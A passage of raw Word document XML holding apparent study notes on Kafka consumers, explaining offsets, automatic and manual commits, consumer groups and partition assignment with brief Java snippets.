    </w:p>
    <w:p w14:paraId="3BC8B2B6"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17E9E6">
          <v:rect id="_x0000_i3342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7CB49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n Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54295288"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keeps track of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>which message</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the consumer has read using </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50501C66"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 position of the record in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E4B99"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mmitting offset = "I've processed this message."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886FE8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wo types of commits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE05C7D"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commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (enable.auto.commit=true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348E527"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using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BD66B" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00E51096" w:rsidRDefault="00BC62CE" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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commitSync();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ADAB21"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50A19">
          <v:rect id="_x0000_i3343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="728AC5F6"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Consumer Group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D95851"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in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same group</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DEF45"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partitions to consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40710DB9"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partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read by only one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C283C03"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If one consumer fails → another consumer in the group takes over its partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9315B5"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1505A">
          <v:rect id="_x0000_i3344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB499B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Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A790C7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uppose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF2F88"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 orders has </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F3E23"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2 consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in group order-processors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F945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hen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9B90D9"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will assign 2 partitions to Consumer-1 and 1 to Consumer-2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A109F3C"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will be read </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>once by one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB9A8CC"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45C6B">
          <v:rect id="_x0000_i3345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D787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4626"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="21B22384" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01527B3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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="544CCF1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010A1D85" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A0942B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Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60503B9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ads data from Kafka topics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3C5B2F14" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1B23BF"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38374B94"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osition of message in a partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="3D4554F6" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1129E29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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE689E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ultiple consumers cooperate to read messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="752E2CE1" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D9266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ing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A215E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explicitly poll Kafka for messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5CF1C8D2" w14:textId="77777777" w:rsidTr="00BC62CE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="077CB345"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 Assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F61789"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distributes partitions among group members</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B20944" w14:textId="77777777" w:rsidR="00BC62CE" w:rsidRPr="00CE4B95"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3346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEDB20A" w14:textId="13B033AD"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828" w:name="_Toc197868042"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the Kafka consumer role and how it reads messages from topics and manages offsets?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="828"/>
    </w:p>
    <w:p w14:paraId="0B710640" w14:textId="29810432" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890"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a clear explanation of the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Consumer role</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, how it </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and how it </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manages offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09846B"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C0C224">
          <v:rect id="_x0000_i3347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29B512"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afka Consumer Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D142FD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w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7CC6D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bing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to one or more Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5F21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w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data (messages/events) from assigned partitions of those topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386169C"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r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E0A81"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ting offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track the progress of message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85DAAA"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E4B792">
          <v:rect id="_x0000_i3348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322A9D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Kafka Consumer Reads Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DB51B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ption to Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB79F3"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uses the subscribe() method to register interest in one or more topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E26B9F"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subscribe(Collections.singletonList("user-events"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06476E7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 Messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66359A"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polls Kafka for new data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55235BBE"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turns records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assigned partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883592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Records&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(100));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7200BBF5"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serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21379114"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deserializes the key and value using configured deserializers (e.g., StringDeserializer, JsonDeserializer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC57578"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p>
    <w:p w14:paraId="11386832"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application processes each record (key-value pair) one by one or in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01F359"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63235F">
          <v:rect id="_x0000_i3349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1651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2EF0E3D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n Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60EAC5"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n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xml:space="preserve"> is a unique ID assigned to each record with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231B6E98"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t's a marker for the consumer: “What’s the next message to read?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E8DB0"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Commit Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E9C4A"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matic Commit</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE8664"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d by enable.auto.commit=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D769D6A"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utomatically commits the latest offset at intervals (default: 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81EBB6"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suitable for reliable processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C76DC"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p w14:paraId="2BA8DCA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veloper has full control over when to commit the offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08257033" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>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commitSync(); // synchronously commit the offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4E08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afer, especially in failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9E7FA7"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 Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E93D05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Sync() – waits for broker acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC1C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Async() – commits in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3C49F"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Best Practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AE2A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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual offset commit</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after the message has been successfully processed, to ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at-least-once delivery</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5E0CF"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0CA5C">
          <v:rect id="_x0000_i3350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2B4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Consumer Groups and Partition Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E5673"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in the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share topic partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49573A97"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assigns </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one partition to one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F9144"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nsures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tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24B27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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEA9F7"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has 3 partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B2799"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group has 2 consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629ADB44" w14:textId="77777777" w:rsidR="00651890" w:rsidRPr="008E5BA7" w:rsidRDefault="00651890" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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consumer gets 2 partitions, the other gets 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAB2D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dies →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partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CCF76"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6FCC8A">
          <v:rect id="_x0000_i3351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F890E"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4946"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="23FC8511" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BB9B7DA"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ept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ECEF0E6"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530D0482" w14:textId="77777777" w:rsidTr="00651890">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
